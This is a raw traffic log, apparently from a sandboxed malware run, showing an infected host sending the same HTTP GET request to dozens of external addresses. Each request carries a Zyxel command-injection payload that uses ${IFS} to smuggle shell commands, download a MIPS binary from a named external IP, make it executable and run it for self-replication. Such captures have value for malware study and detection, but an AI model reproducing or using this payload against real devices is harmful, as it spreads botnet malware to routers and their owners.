                                      Jan 19, 2024 17:29:25.640414953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2830192.168.2.14328388.140.41.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640465975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2831192.168.2.144256619.119.26.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640499115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2832192.168.2.143441620.121.27.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640552044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2833192.168.2.144987274.161.227.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640602112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2834192.168.2.1433786209.118.237.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640644073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2835192.168.2.1443920108.99.142.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640665054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2836192.168.2.1443492195.148.182.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640691996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2837192.168.2.1457072197.14.202.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640748978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2838192.168.2.1451858132.177.92.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640774965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2839192.168.2.1453536175.60.131.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640821934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2840192.168.2.1442302222.145.134.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640861988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2841192.168.2.1451754115.226.254.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640909910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2842192.168.2.144994060.169.95.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.640963078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2843192.168.2.1447646210.26.124.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641002893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2844192.168.2.143439420.238.34.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641031027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2845192.168.2.1454142181.132.9.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641103983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2846192.168.2.1442922220.146.104.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641153097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2847192.168.2.145276287.255.179.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641186953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2848192.168.2.1450784190.137.89.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641202927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2849192.168.2.14429661.182.57.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641222000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2850192.168.2.146090038.144.66.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641288996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2851192.168.2.144941269.48.201.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641314030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2852192.168.2.1453556133.74.79.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641352892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2853192.168.2.1447926113.11.35.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641381025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2854192.168.2.1446514186.46.60.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641407967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2855192.168.2.1456202115.119.31.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641437054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2856192.168.2.145422413.84.168.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641463995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2857192.168.2.1446962200.157.33.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641505957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2858192.168.2.1448208139.141.86.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641542912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2859192.168.2.145276050.119.175.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641587019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2860192.168.2.1441056152.251.122.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641618967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2861192.168.2.1456100155.163.188.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641643047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2862192.168.2.1459916187.252.124.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641690969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2863192.168.2.1457360126.64.245.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641733885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2864192.168.2.1441432171.175.93.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641784906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2865192.168.2.1445022108.151.59.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641813040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2866192.168.2.1457202209.31.12.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641845942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2867192.168.2.1459416105.198.131.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641896009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2868192.168.2.1434562204.158.129.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641912937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2869192.168.2.14511062.42.84.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.641966105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2870192.168.2.1441178198.106.231.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642002106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2871192.168.2.1442296161.205.28.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642028093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2872192.168.2.1451398107.203.121.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642055988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2873192.168.2.144241889.155.111.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642090082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2874192.168.2.1444508195.241.0.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642143011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2875192.168.2.1433854111.47.100.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642201900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2876192.168.2.1448236113.242.109.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642239094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2877192.168.2.145080077.12.169.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642281055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2878192.168.2.144297217.217.39.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642318964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2879192.168.2.1448894134.191.202.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642347097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2880192.168.2.1439100109.11.252.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642376900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2881192.168.2.145211013.160.115.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642405987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2882192.168.2.1443438216.217.58.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642450094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2883192.168.2.145972049.77.204.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642503977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2884192.168.2.146027286.247.203.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642529964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2885192.168.2.1448752205.134.181.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642580032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2886192.168.2.1433144175.59.31.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642611027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2887192.168.2.1449982104.66.68.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642643929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2888192.168.2.144260212.127.103.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642674923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2889192.168.2.145265671.64.145.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642719030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2890192.168.2.1460170176.49.205.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642775059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2891192.168.2.1440460144.60.180.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642818928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2892192.168.2.1453718130.236.49.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:25.642852068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2893192.168.2.143938245.179.172.78443
                                      TimestampBytes transferredDirectionData
